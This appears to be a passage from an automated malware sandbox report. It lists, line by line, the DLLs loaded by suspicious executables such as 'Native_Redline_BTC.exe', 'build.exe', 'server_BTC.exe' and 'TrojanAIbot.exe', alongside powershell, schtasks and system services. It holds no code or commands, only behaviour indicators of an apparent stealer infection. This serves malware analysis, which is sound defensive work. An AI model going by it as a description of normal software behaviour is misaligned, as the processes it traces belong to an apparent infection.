                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: dwrite.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: msvcp140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: dpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: rstrtmgr.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: windowscodecs.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ntmarta.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: linkinfo.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ntshrui.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: cscapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: mpr.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: winnsi.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: webio.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: edputil.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\AppVClient.exeSection loaded: appvpolicy.dll
                            Source: C:\Windows\System32\AppVClient.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\AppVClient.exeSection loaded: wtsapi32.dll
                            Source: C:\Windows\System32\AppVClient.exeSection loaded: netapi32.dll
                            Source: C:\Windows\System32\AppVClient.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\AppVClient.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\AppVClient.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\AppVClient.exeSection loaded: samcli.dll
                            Source: C:\Windows\System32\AppVClient.exeSection loaded: logoncli.dll
                            Source: C:\Windows\System32\AppVClient.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\AppVClient.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\AppVClient.exeSection loaded: mpr.dll
                            Source: C:\Windows\System32\AppVClient.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\AppVClient.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\AppVClient.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\AppVClient.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\AppVClient.exeSection loaded: appmanagementconfiguration.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: mpr.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxsresm.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: ualapi.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                            Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dll
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winhttp.dll
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: mpr.dll
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: secur32.dll
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: sspicli.dll
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dnsapi.dll
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: iphlpapi.dll
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntmarta.dll
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dll
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dll
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dll
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dll
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dll
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dll
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dll
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dll
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dll
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: msdtctm.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcprx.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: msdtclog.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: winmm.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: xolehlp.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: ktmw32.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: mpr.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: comres.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcvsp1res.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: mtxoci.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: oci.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: wkscli.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: cscapi.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: firewallapi.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: fwbase.dll
                            Source: C:\Windows\System32\msdtc.exeSection loaded: fwpolicyiomgr.dll
